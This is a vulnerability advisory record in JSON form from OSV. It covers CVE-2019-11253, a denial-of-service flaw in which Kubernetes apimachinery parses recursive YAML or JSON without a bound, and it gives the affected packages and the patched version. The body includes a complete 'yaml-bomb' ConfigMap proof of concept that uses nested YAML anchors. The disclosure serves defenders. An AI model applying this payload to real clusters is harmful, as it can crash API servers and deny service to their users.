{"id":"GHSA-74fp-r6jw-h4mp","aliases":["GO-2022-0965"],"title":"Kubernetes apimachinery packages vulnerable to unbounded recursion in JSON or YAML parsing","summary":"Kubernetes apimachinery packages vulnerable to unbounded recursion in JSON or YAML parsing","severity":"high","cvss":7.5,"cvssVector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","vendor":"apimachinery","product":"k8s.io/apimachinery","ecosystem":"go","affected":["k8s.io/apimachinery < 0.0.0-20190927203648-9ce6eca90e73"],"patched":["k8s.io/apimachinery 0.0.0-20190927203648-9ce6eca90e73"],"published":"2023-02-08","updated":"2026-08-07","source":"OSV","sourceUrl":"https://osv.dev/vulnerability/GHSA-74fp-r6jw-h4mp","references":[{"url":"https://nvd.nist.gov/vuln/detail/CVE-2019-11253"},{"url":"https://github.com/kubernetes/kubernetes/issues/83253"},{"url":"https://github.com/kubernetes/kubernetes/pull/83261"},{"url":"https://github.com/advisories/GHSA-pmqp-h87c-mr78"},{"url":"https://github.com/kubernetes/kubernetes"},{"url":"https://groups.google.com/g/kubernetes-security-announce/c/jk8polzSUxs"},{"url":"https://pkg.go.dev/vuln/GO-2022-0965"},{"url":"https://stackoverflow.com/questions/58129150/security-yaml-bomb-user-can-restart-kube-api-by-sending-configmap"}],"tags":["osv","go"],"ingestedAt":"2026-08-07T19:14:16.032Z","slug":"GHSA-74fp-r6jw-h4mp","body":"## Overview\n\nCVE-2019-11253 is a denial of service vulnerability in the kube-apiserver, allowing authorized users sending malicious YAML or JSON payloads to cause kube-apiserver to consume excessive CPU or memory, potentially crashing and becoming unavailable. \n\nWhen creating a ConfigMap object which has recursive references contained in it, excessive CPU usage can occur. This appears to be an instance of a \"Billion Laughs\" attack which is quite well known as an XML parsing issue.\n\nApplying this manifest to a cluster causes the client to hang for some time with considerable CPU usage.\n\n```yaml\napiVersion: v1\ndata:\n  a: &a [\"web\",\"web\",\"web\",\"web\",\"web\",\"web\",\"web\",\"web\",\"web\"]\n  b: &b [*a,*a,*a,*a,*a,*a,*a,*a,*a]\n  c: &c [*b,*b,*b,*b,*b,*b,*b,*b,*b]\n  d: &d [*c,*c,*c,*c,*c,*c,*c,*c,*c]\n  e: &e [*d,*d,*d,*d,*d,*d,*d,*d,*d]\n  f: &f [*e,*e,*e,*e,*e,*e,*e,*e,*e]\n  g: &g [*f,*f,*f,*f,*f,*f,*f,*f,*f]\n  h: &h [*g,*g,*g,*g,*g,*g,*g,*g,*g]\n  i: &i [*h,*h,*h,*h,*h,*h,*h,*h,*h]\nkind: ConfigMap\nmetadata:\n  name: yaml-bomb\n  namespace: default\n```\n### Specific Go Packages Affected\n- k8s.io/apimachinery/pkg/runtime/serializer/json\n- k8s.io/apimachinery/pkg/util/json\n\n\n## Affected packages\n\n- `k8s.io/apimachinery < 0.0.0-20190927203648-9ce6eca90e73`\n\n## Remediation\n\nUpgrade to a patched release:\n\n- `k8s.io/apimachinery 0.0.0-20190927203648-9ce6eca90e73`","depth":"twilight","depthScore":41,"depthScoreParts":{"impact":41.3,"likelihood":0,"exploitation":0,"ransomware":0},"changes":[]}